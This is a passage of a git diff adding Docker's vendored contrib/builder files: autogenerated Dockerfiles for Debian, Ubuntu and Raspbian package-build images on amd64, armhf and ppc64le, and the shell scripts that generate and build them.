+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile
@@ -0,0 +1,20 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM debian:stretch
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile
new file mode 100644
index 0000000000..bcedb47b94
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile
@@ -0,0 +1,22 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM debian:wheezy-backports
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list
+
+RUN apt-get update && apt-get install -y -t wheezy-backports btrfs-tools --no-install-recommends && rm -rf /var/lib/apt/lists/*
+RUN apt-get update && apt-get install -y apparmor bash-completion  build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh
new file mode 100755
index 0000000000..765db5d8e9
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh
@@ -0,0 +1,149 @@
+#!/bin/bash
+set -e
+
+# usage: ./generate.sh [versions]
+#    ie: ./generate.sh
+#        to update all Dockerfiles in this directory
+#    or: ./generate.sh debian-jessie
+#        to only update debian-jessie/Dockerfile
+#    or: ./generate.sh debian-newversion
+#        to create a new folder and a Dockerfile within it
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+versions=( "$@" )
+if [ ${#versions[@]} -eq 0 ]; then
+	versions=( */ )
+fi
+versions=( "${versions[@]%/}" )
+
+for version in "${versions[@]}"; do
+	distro="${version%-*}"
+	suite="${version##*-}"
+	from="${distro}:${suite}"
+
+	case "$from" in
+		debian:wheezy)
+			# add -backports, like our users have to
+			from+='-backports'
+			;;
+	esac
+
+	mkdir -p "$version"
+	echo "$version -> FROM $from"
+	cat > "$version/Dockerfile" <<-EOF
+		#
+		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+		#
+
+		FROM $from
+	EOF
+
+	echo >> "$version/Dockerfile"
+
+	if [ "$distro" = "debian" ]; then
+		cat >> "$version/Dockerfile" <<-'EOF'
+			# allow replacing httpredir or deb mirror
+			ARG APT_MIRROR=deb.debian.org
+			RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+		EOF
+
+		if [ "$suite" = "wheezy" ]; then
+			cat >> "$version/Dockerfile" <<-'EOF'
+				RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list
+			EOF
+		fi
+
+		echo "" >> "$version/Dockerfile"
+	fi
+
+	extraBuildTags='pkcs11'
+	runcBuildTags=
+
+	# this list is sorted alphabetically; please keep it that way
+	packages=(
+		apparmor # for apparmor_parser for testing the profile
+		bash-completion # for bash-completion debhelper integration
+		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
+		build-essential # "essential for building Debian packages"
+		cmake # tini dep
+		curl ca-certificates # for downloading Go
+		debhelper # for easy ".deb" building
+		dh-apparmor # for apparmor debhelper
+		dh-systemd # for systemd debhelper integration
+		git # for "git commit" info in "docker -v"
+		libapparmor-dev # for "sys/apparmor.h"
+		libdevmapper-dev # for "libdevmapper.h"
+		libltdl-dev # for pkcs11 "ltdl.h"
+		libseccomp-dev  # for "seccomp.h" & "libseccomp.so"
+		libsqlite3-dev # for "sqlite3.h"
+		pkg-config # for detecting things like libsystemd-journal dynamically
+		vim-common # tini dep
+	)
+	# packaging for "sd-journal.h" and libraries varies
+	case "$suite" in
+		precise|wheezy) ;;
+		jessie|trusty) packages+=( libsystemd-journal-dev );;
+		*) packages+=( libsystemd-dev );;
+	esac
+
+	# debian wheezy & ubuntu precise do not have the right libseccomp libs
+	# debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :(
+	case "$suite" in
+		precise|wheezy|jessie|trusty)
+			packages=( "${packages[@]/libseccomp-dev}" )
+			runcBuildTags="apparmor selinux"
+			;;
+		*)
+			extraBuildTags+=' seccomp'
+			runcBuildTags="apparmor seccomp selinux"
+			;;
+	esac
+
+
+	if [ "$suite" = 'precise' ]; then
+		# precise has a few package issues
+
+		# - dh-systemd doesn't exist at all
+		packages=( "${packages[@]/dh-systemd}" )
+
+		# - libdevmapper-dev is missing critical structs (too old)
+		packages=( "${packages[@]/libdevmapper-dev}" )
+		extraBuildTags+=' exclude_graphdriver_devicemapper'
+
+		# - btrfs-tools is missing "ioctl.h" (too old), so it's useless
+		#   (since kernels on precise are old too, just skip btrfs entirely)
+		packages=( "${packages[@]/btrfs-tools}" )
+		extraBuildTags+=' exclude_graphdriver_btrfs'
+	fi
+
+	if [ "$suite" = 'wheezy' ]; then
+		# pull a couple packages from backports explicitly
+		# (build failures otherwise)
+		backportsPackages=( btrfs-tools )
+		for pkg in "${backportsPackages[@]}"; do
+			packages=( "${packages[@]/$pkg}" )
+		done
+		echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+	fi
+
+	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
+	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
+	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	# print build tags in alphabetical order
+	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
+
+	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
+	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile
new file mode 100644
index 0000000000..aa027f83b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM ubuntu:precise
+
+RUN apt-get update && apt-get install -y apparmor bash-completion  build-essential cmake curl ca-certificates debhelper dh-apparmor  git libapparmor-dev  libltdl-dev  libsqlite3-dev pkg-config vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor exclude_graphdriver_btrfs exclude_graphdriver_devicemapper pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile
new file mode 100644
index 0000000000..b03a853ed6
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM ubuntu:trusty
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile
new file mode 100644
index 0000000000..af03f6226f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM ubuntu:xenial
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile
new file mode 100644
index 0000000000..5ac1edf1a4
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/amd64/generate.sh"!
+#
+
+FROM ubuntu:yakkety
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile
new file mode 100644
index 0000000000..a4ac781eb9
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile
@@ -0,0 +1,20 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
+#
+
+FROM armhf/debian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh
new file mode 100755
index 0000000000..e110a219ab
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh
@@ -0,0 +1,158 @@
+#!/bin/bash
+set -e
+
+# usage: ./generate.sh [versions]
+#    ie: ./generate.sh
+#        to update all Dockerfiles in this directory
+#    or: ./generate.sh debian-jessie
+#        to only update debian-jessie/Dockerfile
+#    or: ./generate.sh debian-newversion
+#        to create a new folder and a Dockerfile within it
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+versions=( "$@" )
+if [ ${#versions[@]} -eq 0 ]; then
+	versions=( */ )
+fi
+versions=( "${versions[@]%/}" )
+
+for version in "${versions[@]}"; do
+	distro="${version%-*}"
+	suite="${version##*-}"
+	from="${distro}:${suite}"
+
+	case "$from" in
+		raspbian:jessie)
+			from="resin/rpi-raspbian:jessie"
+			;;
+		*)
+			from="armhf/$from"
+			;;
+	esac
+
+	mkdir -p "$version"
+	echo "$version -> FROM $from"
+	cat > "$version/Dockerfile" <<-EOF
+		#
+		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
+		#
+
+		FROM $from
+	EOF
+
+	echo >> "$version/Dockerfile"
+
+	if [[ "$distro" = "debian" || "$distro" = "raspbian" ]]; then
+		cat >> "$version/Dockerfile" <<-'EOF'
+			# allow replacing httpredir or deb mirror
+			ARG APT_MIRROR=deb.debian.org
+			RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+		EOF
+
+		if [ "$suite" = "wheezy" ]; then
+			cat >> "$version/Dockerfile" <<-'EOF'
+				RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list.d/backports.list
+			EOF
+		fi
+
+		echo "" >> "$version/Dockerfile"
+	fi
+
+	extraBuildTags='pkcs11'
+	runcBuildTags=
+
+	# this list is sorted alphabetically; please keep it that way
+	packages=(
+		apparmor # for apparmor_parser for testing the profile
+		bash-completion # for bash-completion debhelper integration
+		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
+		build-essential # "essential for building Debian packages"
+		cmake # tini dep
+		curl ca-certificates # for downloading Go
+		debhelper # for easy ".deb" building
+		dh-apparmor # for apparmor debhelper
+		dh-systemd # for systemd debhelper integration
+		git # for "git commit" info in "docker -v"
+		libapparmor-dev # for "sys/apparmor.h"
+		libdevmapper-dev # for "libdevmapper.h"
+		libltdl-dev # for pkcs11 "ltdl.h"
+		libseccomp-dev  # for "seccomp.h" & "libseccomp.so"
+		libsqlite3-dev # for "sqlite3.h"
+		pkg-config # for detecting things like libsystemd-journal dynamically
+		vim-common # tini dep
+	)
+	# packaging for "sd-journal.h" and libraries varies
+	case "$suite" in
+		precise|wheezy) ;;
+		jessie|trusty) packages+=( libsystemd-journal-dev );;
+		*) packages+=( libsystemd-dev );;
+	esac
+
+	# debian wheezy & ubuntu precise do not have the right libseccomp libs
+	# debian jessie & ubuntu trusty have a libseccomp < 2.2.1 :(
+	case "$suite" in
+		precise|wheezy|jessie|trusty)
+			packages=( "${packages[@]/libseccomp-dev}" )
+			runcBuildTags="apparmor selinux"
+			;;
+		*)
+			extraBuildTags+=' seccomp'
+			runcBuildTags="apparmor seccomp selinux"
+			;;
+	esac
+
+
+	if [ "$suite" = 'precise' ]; then
+		# precise has a few package issues
+
+		# - dh-systemd doesn't exist at all
+		packages=( "${packages[@]/dh-systemd}" )
+
+		# - libdevmapper-dev is missing critical structs (too old)
+		packages=( "${packages[@]/libdevmapper-dev}" )
+		extraBuildTags+=' exclude_graphdriver_devicemapper'
+
+		# - btrfs-tools is missing "ioctl.h" (too old), so it's useless
+		#   (since kernels on precise are old too, just skip btrfs entirely)
+		packages=( "${packages[@]/btrfs-tools}" )
+		extraBuildTags+=' exclude_graphdriver_btrfs'
+	fi
+
+	if [ "$suite" = 'wheezy' ]; then
+		# pull a couple packages from backports explicitly
+		# (build failures otherwise)
+		backportsPackages=( btrfs-tools )
+		for pkg in "${backportsPackages[@]}"; do
+			packages=( "${packages[@]/$pkg}" )
+		done
+		echo "RUN apt-get update && apt-get install -y -t $suite-backports ${backportsPackages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+	fi
+
+	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
+	if [ "$distro" == 'raspbian' ];
+	then
+		cat <<EOF >> "$version/Dockerfile"
+# GOARM is the ARM architecture version which is unrelated to the above Golang version
+ENV GOARM 6
+EOF
+	fi
+	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
+	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
+
+	echo >> "$version/Dockerfile"
+
+	# print build tags in alphabetical order
+	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
+
+	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
+	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile
new file mode 100644
index 0000000000..4dbfd093d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile
@@ -0,0 +1,22 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
+#
+
+FROM resin/rpi-raspbian:jessie
+
+# allow replacing httpredir or deb mirror
+ARG APT_MIRROR=deb.debian.org
+RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+# GOARM is the ARM architecture version which is unrelated to the above Golang version
+ENV GOARM 6
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile
new file mode 100644
index 0000000000..b36c1dac71
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
+#
+
+FROM armhf/ubuntu:trusty
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev  libsqlite3-dev pkg-config vim-common libsystemd-journal-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
+ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile
new file mode 100644
index 0000000000..b5e55ad2dd
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
+#
+
+FROM armhf/ubuntu:xenial
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile
new file mode 100644
index 0000000000..69c2e7f2d4
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/armhf/generate.sh"!
+#
+
+FROM armhf/ubuntu:yakkety
+
+RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config vim-common libsystemd-dev --no-install-recommends && rm -rf /var/lib/apt/lists/*
+
+ENV GO_VERSION 1.7.5
+RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-armv6l.tar.gz" | tar xzC /usr/local
+ENV PATH $PATH:/usr/local/go/bin
+
+ENV AUTO_GOPATH 1
+
+ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux
+ENV RUNC_BUILDTAGS apparmor seccomp selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh
new file mode 100755
index 0000000000..7d22e8c47f
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh
@@ -0,0 +1,10 @@
+#!/bin/bash
+set -e 
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+set -x
+./generate.sh
+for d in */; do
+	docker build -t "dockercore/builder-deb:$(basename "$d")" "$d"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh
new file mode 100755
index 0000000000..0e20b9c4b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh
@@ -0,0 +1,103 @@
+#!/bin/bash
+set -e
+
+# This file is used to auto-generate Dockerfiles for making debs via 'make deb'
+#
+# usage: ./generate.sh [versions]
+#    ie: ./generate.sh
+#        to update all Dockerfiles in this directory
+#    or: ./generate.sh ubuntu-xenial
+#        to only update ubuntu-xenial/Dockerfile
+#    or: ./generate.sh ubuntu-newversion
+#        to create a new folder and a Dockerfile within it
+
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+versions=( "$@" )
+if [ ${#versions[@]} -eq 0 ]; then
+	versions=( */ )
+fi
+versions=( "${versions[@]%/}" )
+
+for version in "${versions[@]}"; do
+	echo "${versions[@]}"
+	distro="${version%-*}"
+	suite="${version##*-}"
+	from="ppc64le/${distro}:${suite}"
+
+	mkdir -p "$version"
+	echo "$version -> FROM $from"
+	cat > "$version/Dockerfile" <<-EOF
+		#
+		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
+		#
+
+		FROM $from
+
+	EOF
+
+	extraBuildTags='pkcs11'
+	runcBuildTags=
+
+	# this list is sorted alphabetically; please keep it that way
+	packages=(
+		apparmor # for apparmor_parser for testing the profile
+		bash-completion # for bash-completion debhelper integration
+		btrfs-tools # for "btrfs/ioctl.h" (and "version.h" if possible)
+		build-essential # "essential for building Debian packages"
+		cmake # tini dep
+		curl ca-certificates # for downloading Go
+		debhelper # for easy ".deb" building
+		dh-apparmor # for apparmor debhelper
+		dh-systemd # for systemd debhelper integration
+		git # for "git commit" info in "docker -v"
+		libapparmor-dev # for "sys/apparmor.h"
+		libdevmapper-dev # for "libdevmapper.h"
+		libltdl-dev # for pkcs11 "ltdl.h"
+		libsqlite3-dev # for "sqlite3.h"
+		pkg-config # for detecting things like libsystemd-journal dynamically
+		vim-common # tini dep
+	)
+
+	case "$suite" in
+		trusty) 
+			packages+=( libsystemd-journal-dev )
+			;;
+		*)
+			# libseccomp isn't available until ubuntu xenial and is required for "seccomp.h" & "libseccomp.so"
+			packages+=( libseccomp-dev )
+			packages+=( libsystemd-dev )
+			;;
+	esac
+
+	# buildtags
+	case "$suite" in
+		# trusty has no seccomp package
+		trusty)
+			runcBuildTags="apparmor selinux"
+		;;
+		# ppc64le support was backported into libseccomp 2.2.3-2,
+		# so enable seccomp by default
+		*)
+			extraBuildTags+=' seccomp'
+			runcBuildTags="apparmor seccomp selinux"
+			;;
+	esac
+	
+	# update and install packages
+	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile.ppc64le >> "$version/Dockerfile"
+	echo 'RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-ppc64le.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
+	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
+	echo >> "$version/Dockerfile"
+
+	# print build tags in alphabetical order
+	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
+	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
+	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
+done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile
new file mode 100644
index 0000000000..4182d683b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile
@@ -0,0 +1,16 @@
+#
+# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/ppc64le/generate.sh"!
+#
+
+FROM ppc64le/ubuntu:trusty
+
